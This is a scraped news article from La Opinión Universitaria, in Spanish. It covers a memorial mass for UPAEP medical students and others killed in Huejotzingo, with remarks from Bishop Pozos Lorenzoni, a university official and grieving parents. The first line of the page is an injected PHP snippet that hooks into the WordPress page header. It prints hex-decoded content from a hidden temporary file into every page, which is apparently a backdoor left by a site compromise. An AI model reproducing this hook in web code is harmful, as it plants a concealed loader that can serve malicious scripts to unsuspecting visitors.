if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } “El mal no debe tener la última palabra” señala el Obispo Pozos Lorenzini – La Opinión Universitaria La Opinión Universitaria
Menu

“El mal no debe tener la última palabra” señala el Obispo Pozos Lorenzini

 

+ Misa en memoria de los Estudiantes de UPAEP Muertos en Huejotzingo

Pilar Bravo

El Obispo Felipe Pozos Lorenzoni, ofició la misa in memorian a los estudiantes de Medicina, Ximena Quijano Hernández, Antonio Parada Zerpa , alumnos de la Facultad de Medicina de esta institución .

Pero también se ofreció la misa por Francisco Javier Tirado y José Emanuel Vital Castillo , uno estudiante de la Buap , y el otro operador de Uber, por todos se pidió por la salvación de sus almas y consuelo de sus padres y familiares.

En su mensaje señaló a los dolientes tener esperanza en la justicia divina “ el mal NO tiene la última palabra “. Dijo en su mensaje el Obispo

Por eso reconoció que los padres tienen derecho a estar enojados y a cuestionar esta injusticia, pero el mal no debe vencerlos.

No se van a quedar con los brazos cruzados ni caer en la indiferencia, por el contrario, van a vivir con energía para cambiar el mundo por algo mejor, sin odio ni venganza.

En la ceremonia religiosa hablo el secretario general de la UPAEP, José Antonio Llergo Victoria , además de darle el pésame a los padres de los alumnos, señaló tener confianza en la justicia y de que la institución universitaria no es indiferente ante la pérdida de los alumnos.

Los Padres

Al término de la misa, los padres de Antonio Parada y de Jimena Quijano Hernández, agradecieron la atención que les proporcionaron las autoridades de Puebla y de la Upaep para agilizar los trámites, que les permita la recuperación de los cuerpos de sus hijos.

En un sentido mensaje, revelaron el entusiasmo que tenían sus hijos que llegaron a Mexico en agosto pasado , para hacer su internado en la UPAEP, ellos estudiaron la carrera en Colombia y habían decidido hacer su internado y su especialidad en Mexico, sin embargo, señalaron “Mexico se los quitó.”

Ellos tenían por delante muchas ilusiones por ser los mejores médicos y en sus prácticas que realizaron desde su llegada a Puebla, atendieron todo tipo de pacientes, incluyendo a los delincuentes.

 

El padre de Jimenez, Jorge Enrique Quijano, con la voz cortada, narró el entusiasmo de Jimena por alcanzar más en el conocimiento médico. Hizo un llamado o no dejar que la delincuencia triunfe. Se debe- dijo “dar un grito de no más violencia, no más extorsión ,ni asesinatos ni secuestros” y reconoció que la delincuencia existe en Colombia como en México.

En la misa no hubo ni cuerpos presentes ni cenizas, porque, apenas por la tarde se les había entregado los cuerpos, por respeto a los familiares, no hubo preguntas, sí serián cremados aquí. Por lo que se optó por el silencio.

 

Tweets recientes